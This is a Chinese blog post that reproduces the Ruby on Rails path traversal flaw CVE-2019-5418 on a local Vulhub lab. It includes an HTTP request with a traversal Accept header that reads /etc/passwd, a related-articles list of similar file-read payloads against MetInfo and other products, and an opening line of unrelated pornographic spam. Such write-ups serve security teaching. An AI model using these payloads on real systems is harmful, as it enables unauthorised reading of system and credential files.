国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

【漏洞復(fù)現(xiàn)】Ruby on Rails 路徑穿越與任意文件讀取漏洞(CVE-2019-5418)

這篇具有很好參考價(jià)值的文章主要介紹了【漏洞復(fù)現(xiàn)】Ruby on Rails 路徑穿越與任意文件讀取漏洞(CVE-2019-5418)。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

一、漏洞簡(jiǎn)介

1. 漏洞簡(jiǎn)介

Ruby on Rails使用了指定參數(shù)的render file來(lái)渲染應(yīng)用之外的視圖,且會(huì)根據(jù)用戶傳入的Accept頭來(lái)確定文件具體位置。我們可以通過(guò)修改訪問(wèn)某控制器的請(qǐng)求包,通過(guò)…/…/…/…/來(lái)達(dá)到路徑穿越的目的,然后再通過(guò){{來(lái)閉合模板查詢路徑,那我們?cè)L問(wèn)的文件會(huì)被當(dāng)做外部模板來(lái)解析。

2. 危害等級(jí)

3. 影響范圍

Rails全版本

其中修復(fù)版本:

6.0.0.beta3

5.2.2.1

5.1.6.2

5.0.7.2

4.2.11.1

二、 復(fù)現(xiàn)環(huán)境

靶機(jī)(搭建的Vulhub漏洞測(cè)試靶場(chǎng)):192.168.15.15
攻擊機(jī)(kali):192.168.15.131
Vulhub漏洞測(cè)試靶場(chǎng)的搭建可參考:Vulhub漏洞測(cè)試靶場(chǎng)搭建

三、復(fù)現(xiàn)過(guò)程

1. 啟動(dòng)漏洞環(huán)境

使用Vulhub啟動(dòng)漏洞環(huán)境
【漏洞復(fù)現(xiàn)】Ruby on Rails 路徑穿越與任意文件讀取漏洞(CVE-2019-5418)

2. 驗(yàn)證漏洞環(huán)境

訪問(wèn)鏈接:http:192.168.15.15:3000 出現(xiàn)以下界面證明環(huán)境搭建成功。

【漏洞復(fù)現(xiàn)】Ruby on Rails 路徑穿越與任意文件讀取漏洞(CVE-2019-5418)

3. 漏洞復(fù)現(xiàn)

訪問(wèn)http://192.168.15.15:3000/robots可見(jiàn),正常的robots.txt文件被讀取出來(lái)。
【漏洞復(fù)現(xiàn)】Ruby on Rails 路徑穿越與任意文件讀取漏洞(CVE-2019-5418)

利用漏洞,使用burpsuite修改Accept參數(shù)進(jìn)行文件讀取,讀取/etc/passwd:

GET /robots HTTP/1.1
Host: your-ip:3000
Accept-Encoding: gzip, deflate
Accept: ../../../../../../../../etc/passwd{{
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

【漏洞復(fù)現(xiàn)】Ruby on Rails 路徑穿越與任意文件讀取漏洞(CVE-2019-5418)

成功讀取到/etc/passwd文件,漏洞復(fù)現(xiàn)成功。

4. 關(guān)閉漏洞環(huán)境

使用完漏洞環(huán)境后記得及時(shí)關(guān)閉漏洞環(huán)境。docker-compose down
【漏洞復(fù)現(xiàn)】Ruby on Rails 路徑穿越與任意文件讀取漏洞(CVE-2019-5418)

四、修復(fù)建議

使用已經(jīng)修復(fù)該漏洞的版本。文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-441071.html

到了這里,關(guān)于【漏洞復(fù)現(xiàn)】Ruby on Rails 路徑穿越與任意文件讀取漏洞(CVE-2019-5418)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • Jenkins CLI 任意文件讀取漏洞復(fù)現(xiàn)

    Jenkins CLI 任意文件讀取漏洞復(fù)現(xiàn)

    Jenkins CLI 是 Jenkins 內(nèi)置的命令行頁(yè)面。 Jenkins 受影響版本中使用 args4j 庫(kù)解析CLI命令參數(shù),該庫(kù)默認(rèn)將參數(shù)中 @ 字符后的文件路徑替換為文件內(nèi)容,未授權(quán)的攻擊者可利用該特性使用 Jenkins 控制器進(jìn)程的默認(rèn)字符編碼讀取 Jenkins 控制器文件系統(tǒng)上的任意文件(如加密密鑰的二進(jìn)

    2024年02月22日
    瀏覽(26)
  • OfficeWeb365 Indexs 任意文件讀取漏洞復(fù)現(xiàn)

    OfficeWeb365 Indexs 任意文件讀取漏洞復(fù)現(xiàn)

    OfficeWeb365 是專(zhuān)注于 Office 文檔在線預(yù)覽及PDF文檔在線預(yù)覽云服務(wù),包括 Microsoft Word 文檔在線預(yù)覽、Excel 表格在線預(yù)覽、Powerpoint 演示文檔在線預(yù)覽,WPS 文字處理、WPS 表格、WPS 演示及 Adobe PDF 文檔在線預(yù)覽。 OfficeWeb365 /Pic/Indexs接口處存在任意文件讀取漏洞,攻擊者可通過(guò)獨(dú)特

    2024年02月03日
    瀏覽(38)
  • 漏洞復(fù)現(xiàn)-Yearning front 任意文件讀取漏洞(附漏洞檢測(cè)腳本)

    漏洞復(fù)現(xiàn)-Yearning front 任意文件讀取漏洞(附漏洞檢測(cè)腳本)

    文章中涉及的漏洞均已修復(fù),敏感信息均已做打碼處理,文章僅做經(jīng)驗(yàn)分享用途,切勿當(dāng)真,未授權(quán)的攻擊屬于非法行為!文章中敏感信息均已做多層打馬處理。傳播、利用本文章所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負(fù)責(zé),作者不為此承擔(dān)

    2024年01月18日
    瀏覽(32)
  • Metinfo6.0.0任意文件讀取漏洞復(fù)現(xiàn)

    Metinfo6.0.0任意文件讀取漏洞復(fù)現(xiàn)

    漏洞原理 在MetInfo6.0.0appsystemincludemodule的old_thumb.class.php文件 可以看到這里對(duì)./進(jìn)行了嚴(yán)格的過(guò)濾,但是卻忽略了在Windows下還可以用…來(lái)跳轉(zhuǎn)目錄 環(huán)境搭建 下載Metinfo6.0.0 配置隨便寫(xiě),自己記住就行 這里前面已經(jīng)審計(jì)過(guò)代碼了,就直接上payload了 http://10.9.75.161/MetInfo6.0.0

    2024年02月10日
    瀏覽(17)
  • metinfo_6.0.0 任意文件讀取漏洞復(fù)現(xiàn)

    metinfo_6.0.0 任意文件讀取漏洞復(fù)現(xiàn)

    漏洞點(diǎn)為/include/thumb.php 一測(cè): /include/thumb.php?dir=..././http/..././config/config_db.php 二測(cè): /include/thumb.php?dir=.....///http/.....///config/config_db.php 三測(cè): /include/thumb.php?dir=http/.....///.....///config/config_db.php 四測(cè): /include/thumb.php?dir=http....configconfig_db.php 注意: 此POC?僅適用于Windows?系統(tǒng)

    2024年01月20日
    瀏覽(22)
  • Metinfo6.0.0任意文件讀取【漏洞復(fù)現(xiàn)】

    Metinfo6.0.0任意文件讀取【漏洞復(fù)現(xiàn)】

    1.1、漏洞描述 漏洞名稱(chēng):MetInfo任意文件讀取 漏洞簡(jiǎn)介:MetInfo是一套使用PHP和MySQL開(kāi)發(fā)的內(nèi)容管理系統(tǒng),其中的 /app/system/include/module/old_thumb.class.php 文件存在任意文件讀取漏洞,攻擊者可利用該漏洞讀取網(wǎng)站的敏感文件。 下載地址:歷史版本安裝文件下載 Ver_6.0.0 1.2、漏洞等

    2024年02月10日
    瀏覽(22)
  • officeWeb365 Indexs接口存在任意文件讀取漏洞復(fù)現(xiàn)

    officeWeb365 Indexs接口存在任意文件讀取漏洞復(fù)現(xiàn)

    OfficeWeb365 是專(zhuān)注于 Office 文檔在線預(yù)覽及PDF文檔在線預(yù)覽云服務(wù),包括 Microsoft Word 文檔在線預(yù)覽、Excel 表格在線預(yù)覽、Powerpoint 演示文檔在線預(yù)覽,WPS 文字處理、WPS 表格、WPS 演示及 Adobe PDF 文檔在線預(yù)覽。OfficeWeb365 /Pic/Indexs接口處存在任意文件讀取漏洞,攻擊者可通過(guò)獨(dú)特

    2024年02月20日
    瀏覽(28)
  • 用友NC word.docx 任意文件讀取漏洞復(fù)現(xiàn)

    用友NC word.docx 任意文件讀取漏洞復(fù)現(xiàn)

    ?用友NC是一款企業(yè)級(jí)ERP軟件。作為一種信息化管理工具,用友NC提供了一系列業(yè)務(wù)管理模塊,包括財(cái)務(wù)會(huì)計(jì)、采購(gòu)管理、銷(xiāo)售管理、物料管理、生產(chǎn)計(jì)劃和人力資源管理等,幫助企業(yè)實(shí)現(xiàn)數(shù)字化轉(zhuǎn)型和高效管理。 用友NC 系統(tǒng)word.docx等接口存在任意文件讀取漏洞,未經(jīng)身份認(rèn)證

    2024年01月25日
    瀏覽(22)
  • 惠爾頓 網(wǎng)絡(luò)安全審計(jì)系統(tǒng) 任意文件讀取漏洞復(fù)現(xiàn)

    惠爾頓 網(wǎng)絡(luò)安全審計(jì)系統(tǒng) 任意文件讀取漏洞復(fù)現(xiàn)

    惠爾頓網(wǎng)絡(luò)安全審計(jì)產(chǎn)品致力于滿足軍工四證、軍工保密室建設(shè)、國(guó)家涉密網(wǎng)絡(luò)建設(shè)的審計(jì)要求,規(guī)范網(wǎng)絡(luò)行為,滿足國(guó)家的規(guī)范;支持1-3線路的internet接入、1-3對(duì)網(wǎng)橋;含強(qiáng)大的上網(wǎng)行為管理、審計(jì)、監(jiān)控模塊;用戶訪問(wèn)功能,內(nèi)容過(guò)濾功能;流量控制功能、帶寬管理功能

    2024年02月22日
    瀏覽(28)
  • IP-guard WebServer 任意文件讀取漏洞復(fù)現(xiàn)

    IP-guard WebServer 任意文件讀取漏洞復(fù)現(xiàn)

    ?IP-guard是由溢信科技股份有限公司開(kāi)發(fā)的一款終端安全管理軟件,旨在幫助企業(yè)保護(hù)終端設(shè)備安全、數(shù)據(jù)安全、管理網(wǎng)絡(luò)使用和簡(jiǎn)化IT系統(tǒng)管理。 由于IP-guard WebServer?/ipg/static/appr/lib/flexpaper/php/view.php接口處未對(duì)用戶輸入的數(shù)據(jù)進(jìn)行嚴(yán)格的校驗(yàn)和過(guò)濾。未經(jīng)身份驗(yàn)證的攻擊者可

    2024年04月12日
    瀏覽(19)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包